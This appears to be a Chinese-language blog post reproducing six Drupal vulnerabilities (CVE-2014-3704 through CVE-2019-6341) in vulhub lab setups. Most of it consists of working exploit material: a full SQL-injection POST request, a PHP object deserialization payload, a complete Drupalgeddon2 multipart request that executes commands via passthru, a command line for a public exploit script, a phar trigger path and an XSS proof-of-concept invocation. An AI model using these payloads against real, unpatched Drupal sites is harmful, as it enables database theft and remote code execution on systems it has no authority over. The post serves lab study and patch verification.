Drupal

1.漏洞复现

CVE-2014-3704 SQL注入(vulhub)

影响范围:Drupal 7.0 - 7.31

访问 http://IP:8080 进行安装,Database name填drupal、数据库账号密码填root、Database host填mysql

POST请求进行SQL注入

POST / HTTP/1.1
Host: 192.168.135.131:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Connection: close
Upgrade-Insecure-Requests: 1

pass=lol&form_build_id=&form_id=user_login_block&op=Log%2Bin&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

CVE-2017-6920(vulhub)

影响范围:Drupal 8.x - 8.3.4

访问 http://IP:8080 进行安装,语言选English、数据库选SQLite

登录后台,访问/admin/config/development/configuration/single/import

Configuration type选Simple configuration、名称随意->内容填入Payload

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

CVE-2018-7600(vulhub)

影响范围:Drupal 6.x、7.x、8.x

一样安装

POST请求命令执行

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.135.111:8088
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 620
Connection: close

-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"

passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"

markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"

whoami
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"

user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"

CVE-2018-7602(vulhub)

影响范围:Drupal 6.x、7.x、8.x

访问 http://IP:8081 之后一样安装

注册一个账号(vulhub直接用管理员账号),路径:/user/register

漏洞利用脚本,https://github.com/pimps/CVE-2018-7600

python drupa7-CVE-2018-7602.py -c "whoami" 用户名 密码 http://IP:8081/

CVE-2019-6339(vulhub)

影响范围:Drupal 7.x - 7.62、8.5.x - 8.5.9、8.6.x - 8.6.6

访问 http://IP:8080 之后一样安装

登录后台->admin->Edit->上传vulhub自带的blog-ZDI-CAN-7232-cat.jpg

访问/admin/config/media/file-system,输入phar://./sites/default/files/pictures/年-月(两位)/图片名称,触发

CVE-2019-6341 XSS(vulhub)

影响范围:Drupal 7.x - 7.62、8.5.x - 8.5.14、8.6.x - 8.6.13

访问 http://IP:8080 之后一样安装

vulhub自带的漏洞利用脚本blog-poc.php

php blog-poc.php 192.168.152.130 8080

访问 /sites/default/files/pictures/年-月(两位)/_0 触发,但是好像不太好用

posted @ 2023-01-16 23:26  Hacker&Cat  阅读(76)  评论(0编辑  收藏  举报